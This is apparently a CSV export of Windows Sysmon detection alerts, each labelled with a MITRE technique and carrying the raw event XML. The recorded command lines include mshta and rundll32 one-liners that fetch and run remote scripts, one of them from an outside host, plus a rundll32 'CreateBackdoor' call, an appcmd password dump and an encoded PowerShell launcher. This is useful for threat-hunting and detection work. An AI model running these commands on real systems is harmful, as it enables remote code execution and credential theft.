<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:18.583990Z"">
</TimeCreated>
<EventRecordID>4904</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:18.451</Data>
<Data Name=""ProcessGuid"">747F3D96-661E-5D3F-0000-00107F248700</Data>
<Data Name=""ProcessId"">3164</Data>
<Data Name=""Image"">C:\Windows\System32\mshta.exe</Data>
<Data Name=""FileVersion"">11.00.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Microsoft (R) HTML Application host</Data>
<Data Name=""Product"">Internet Explorer</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">mshta.exe javascript:a=GetObject(&quot;script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct&quot;).Exec();close();</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=DD8B22ACEA424823BB64ABF71F61A03D41177C38,MD5=F328FDCFF05BF02C2C986D52AED8BC2A,SHA256=E616C5CE71886652C13E2E1FA45A653B44D492B054F16B15A38418B8507F57C7,IMPHASH=42DA177DE2FAA97C3DFAEC9562772A7F</Data>
<Data Name=""ParentProcessGuid"">747F3D96-661E-5D3F-0000-0010A3148700</Data>
<Data Name=""ParentProcessId"">776</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd /c mshta.exe javascript:a=GetObject(&quot;script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct&quot;).Exec();close();</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766818.050631,2020-03-21T09:00:18.050631+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:18.046159Z"">
</TimeCreated>
<EventRecordID>243527</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:17.682</Data>
<Data Name=""ProcessGuid"">747F3D96-9F61-5E75-0000-001059841E00</Data>
<Data Name=""ProcessId"">8076</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564845391.87585,2019-08-03T19:16:31.875850+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-08-03T15:16:31.779226Z"">
</TimeCreated>
<EventRecordID>5536</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2780"" ThreadID=""3676"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-08-03 15:16:31.676</Data>
<Data Name=""ProcessGuid"">747F3D96-A54F-5D45-0000-0010D83FA101</Data>
<Data Name=""ProcessId"">1716</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-56A3-5D45-0000-0020B3D31800</Data>
<Data Name=""LogonId"">0x18d3b3</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-A54F-5D45-0000-0010C429A101</Data>
<Data Name=""ParentProcessId"">6080</Data>
<Data Name=""ParentImage"">C:\Windows\System32\dllhost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1558452777.867089,2019-05-21T19:32:57.867089+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new%%20ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;mshta https://hotelesms.com/talsk.txt&quot;,0,true); )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-21T15:32:57.286254Z"">
</TimeCreated>
<EventRecordID>4126</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3416"" ThreadID=""3496"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-21 15:32:57.276</Data>
<Data Name=""ProcessGuid"">365ABB72-1A29-5CE4-0000-00107BE42101</Data>
<Data Name=""ProcessId"">2920</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new%%20ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;mshta https://hotelesms.com/talsk.txt&quot;,0,true);</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-39CC-5CE3-0000-002096C70000</Data>
<Data Name=""LogonId"">0xc796</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
<Data Name=""ParentProcessGuid"">365ABB72-1A29-5CE4-0000-001054E32101</Data>
<Data Name=""ParentProcessId"">1532</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd.exe /C rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new%20ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;mshta https://hotelesms.com/talsk.txt&quot;,0,true);</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[ T1086 ] Powershell with Suspicious Argument,1611667274.399477,2021-01-26T17:21:14.399477+04:00,,Threat,Critical,"Found User (LAPTOP-JU4M3I0E\bouss) run Suspicious PowerShell commands that include (powershell,.cmd) in event with Command Line (powershell.exe start-process notepad.exe) and Parent Image :C:\Windows\SysWOW64\cmd.exe , Parent CommandLine (&quot;C:\windows\system32\cmd.exe&quot; /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd) in directory : ( C:\Users\bouss\source\repos\blabla\blabla\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2021-01-26T13:21:14.023510Z"">
</TimeCreated>
<EventRecordID>2429138</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""5272"" ThreadID=""6060"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>LAPTOP-JU4M3I0E</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2021-01-26 13:21:14.021</Data>
<Data Name=""ProcessGuid"">00247C92-174A-6010-0000-0010C0B2D92E</Data>
<Data Name=""ProcessId"">18548</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""FileVersion"">10.0.18362.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows PowerShell</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">PowerShell.EXE</Data>
<Data Name=""CommandLine"">powershell.exe start-process notepad.exe</Data>
<Data Name=""CurrentDirectory"">C:\Users\bouss\source\repos\blabla\blabla\</Data>
<Data Name=""User"">LAPTOP-JU4M3I0E\bouss</Data>
<Data Name=""LogonGuid"">00247C92-5082-600D-0000-0020A246F726</Data>
<Data Name=""LogonId"">0x26f746a2</Data>
<Data Name=""TerminalSessionId"">5</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=2223E8613BB0DD90888B17367007489FE16693E4,MD5=BCC5A6493E0641AA1E60CBF69469E579,SHA256=7762A4766BC394B4CB2D658144B207183FF23B3139181CD74E615DB63E6E57D6,IMPHASH=C6A0924236A2CDF364F3D2FAD87F702A</Data>
<Data Name=""ParentProcessGuid"">00247C92-1749-6010-0000-0010EFAAD92E</Data>
<Data Name=""ParentProcessId"">23168</Data>
<Data Name=""ParentImage"">C:\Windows\SysWOW64\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\windows\system32\cmd.exe&quot; /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd</Data>
</EventData>
</Event>",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1584766818.050631,2020-03-21T09:00:18.050631+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:18.046159Z"">
</TimeCreated>
<EventRecordID>243527</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:17.682</Data>
<Data Name=""ProcessGuid"">747F3D96-9F61-5E75-0000-001059841E00</Data>
<Data Name=""ProcessId"">8076</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1602619902.353945,2020-10-14T00:11:42.353945+04:00,,Threat,Low,Found User (LAPTOP-JU4M3I0E\bouss) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\windows\system32\cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-13T20:11:42.279861Z"">
</TimeCreated>
<EventRecordID>2196443</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""5340"" ThreadID=""7092"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>LAPTOP-JU4M3I0E</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-10-13 20:11:42.277</Data>
<Data Name=""ProcessGuid"">00247C92-09FE-5F86-0000-0010AD861401</Data>
<Data Name=""ProcessId"">7648</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.18362.449 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">c:\windows\system32\cmd.exe</Data>
<Data Name=""CurrentDirectory"">c:\Windows\System32\</Data>
<Data Name=""User"">LAPTOP-JU4M3I0E\bouss</Data>
<Data Name=""LogonGuid"">00247C92-DE70-5F85-0000-002059F80600</Data>
<Data Name=""LogonId"">0x6f859</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">00247C92-09FE-5F86-0000-001051841401</Data>
<Data Name=""ParentProcessId"">1716</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wuauclt.exe</Data>
<Data Name=""ParentCommandLine"">wuauclt.exe /UpdateDeploymentProvider C:\ProgramData\Intel\helpa.dll /RunHandlerComServer </Data>
</EventData>
</Event>",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1558452777.867089,2019-05-21T19:32:57.867089+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new%%20ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;mshta https://hotelesms.com/talsk.txt&quot;,0,true); )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-21T15:32:57.286254Z"">
</TimeCreated>
<EventRecordID>4126</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3416"" ThreadID=""3496"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-21 15:32:57.276</Data>
<Data Name=""ProcessGuid"">365ABB72-1A29-5CE4-0000-00107BE42101</Data>
<Data Name=""ProcessId"">2920</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new%%20ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;mshta https://hotelesms.com/talsk.txt&quot;,0,true);</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-39CC-5CE3-0000-002096C70000</Data>
<Data Name=""LogonId"">0xc796</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
<Data Name=""ParentProcessGuid"">365ABB72-1A29-5CE4-0000-001054E32101</Data>
<Data Name=""ParentProcessId"">1532</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd.exe /C rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new%20ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;mshta https://hotelesms.com/talsk.txt&quot;,0,true);</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920558.5225,2019-05-27T05:29:18.522500+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list apppool /text:processmodel.password ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:29:18.522500Z"">
</TimeCreated>
<EventRecordID>5928</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:29:18.472</Data>
<Data Name=""ProcessGuid"">365ABB72-3D6E-5CEB-0000-0010CC99FF00</Data>
<Data Name=""ProcessId"">344</Data>
<Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
<Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Server Command Line Admin Tool</Data>
<Data Name=""Product"">Internet Information Services</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list apppool /text:processmodel.password</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ParentProcessId"">2584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAb